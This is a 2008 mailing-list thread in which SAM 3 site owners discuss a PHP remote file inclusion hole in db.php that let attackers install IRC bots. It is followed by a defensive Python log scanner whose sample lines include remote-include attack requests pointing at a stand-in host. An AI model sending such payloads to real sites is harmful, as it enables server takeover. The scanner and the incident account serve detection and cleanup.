update has been available for a few months now; my host manager already did a PHP upgrade to my server and to his entire network.

----- Original Message -----
From: Greg Stafford
To: [email protected]
Sent: Wednesday, January 09, 2008 3:51 PM
Subject: RE: [General-discussion] PHP Website Vulnerability.

My site was hacked as well, but I use a webhost (1and1.com). I will remove the files until an update is available.

Thanks,
Greg
http://www.progpalaceradio.com
http://www.myspace.com/progpalaceradio

-----Original Message-----
From: Roy Pait <[email protected]>
Sent: Wednesday, January 09, 2008 3:39 PM
To: [email protected]
Subject: Re: [General-discussion] PHP Website Vulnerability.

Just so everyone knows, this is not a theoretical vuln. My server was hacked 5 days ago (fortunately minimally) and a couple of eggdrop (IRC relay) programs were installed along with some extraneous PHP files (baca.php). It was fairly easily detected and cleaned up, but I tracked it back to db.php, which was being used. I renamed the file (which of course stopped the web site) and then cleaned up.

The basic premise is that the common setting is passed a URL of a site with a PHP text file. This file is parsed and run on the local system, and displays a web page (in PHP) with a command line area. From there it's a simple matter of issuing FTP requests and installing web (PHP or Perl) apps. The user has access at the level that the web server is running at.

This was a slightly modified version of the SAM 3 default site, so the exploit's been there for a while, but it is now known and hackers are actively looking for it. Google is really helpful in that respect, based on the referrer listing just before the hack.

Fortunately my firewall blocked most of what they were trying to do (IRC bot relay and spam generation triggered by the bot, as I disallow IRC from all machines and SMTP is only available from the main server).

Roy Pait

>>> "James Henline" <[email protected]> 1/9/2008 9:36 AM >>>
Please see the following news article for more information.
http://www.spacialaudio.com/news/index.html?newsID=151

_______________________________________________
General-discussion mailing list
[email protected]
http://mailman.spacialaudio.com/mailman/listinfo/general-discussion
TO unsubscribe to this list, simply send a blank email to [email protected] with the subject 'unsubscribe'
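A defender-side detection example, added here and not part of the thread or of SAM 3: it scans web-server access-log lines for the pattern Roy describes, a query parameter carrying a remote URL that a PHP include() with allow_url_include enabled would fetch and execute, and reports the source IP and referrer so the hit can be traced back. The sample log lines, the IP addresses and the parameter names `common` and `page` are constructed for this example, not taken from the page.

```python
import re
from typing import List, Optional
from urllib.parse import parse_qsl, unquote, urlparse

# Apache/nginx "combined" log format: ip ident user [time] "METHOD target PROTO" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# URL schemes that include()/require() will open when allow_url_include (PHP >= 5.2)
# or the older allow_url_fopen behaviour is on; a plain filename or local path has no scheme.
REMOTE_SCHEMES = {"http", "https", "ftp", "ftps", "php", "data", "expect"}


def is_remote_include_value(value: str) -> bool:
    """True if a query-parameter value is a URL a vulnerable include() would fetch."""
    decoded = unquote(value).strip().lower()      # unquote again to catch double-encoding
    return urlparse(decoded).scheme in REMOTE_SCHEMES


def scan_line(line: str) -> Optional[dict]:
    """Return a finding for one log line, or None if no parameter carries a remote URL."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, query = m.group("target").partition("?")
    hits = [(k, v) for k, v in parse_qsl(query, keep_blank_values=True)
            if is_remote_include_value(v)]
    if not hits:
        return None
    return {"ip": m.group("ip"), "path": path, "params": hits,
            "status": m.group("status"), "referer": m.group("referer")}


def scan_log(text: str) -> List[dict]:
    return [r for r in (scan_line(l) for l in text.splitlines()) if r]


# Constructed sample lines (documentation IPs, hypothetical parameter names); line 1 and 3 are hits.
SAMPLE_LOG = """\
203.0.113.5 - - [09/Jan/2008:03:12:44 -0600] "GET /db.php?common=http://198.51.100.7/remote.txt? HTTP/1.1" 200 512 "http://www.google.com/search?q=sam3+db.php" "Mozilla/4.0"
198.51.100.23 - - [09/Jan/2008:03:13:01 -0600] "GET /db.php?common=default HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.5 - - [09/Jan/2008:03:13:09 -0600] "GET /index.php?page=http%3A%2F%2F198.51.100.7%2Fremote.txt HTTP/1.1" 404 301 "-" "Mozilla/4.0"
192.0.2.9 - - [09/Jan/2008:03:14:30 -0600] "GET /index.php?page=news HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

Hits from a search-engine referrer, as in Roy's account, are worth pulling out first; the lasting fix is allow_url_include=Off plus an allowlist of include names rather than a URL or path taken from the request.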
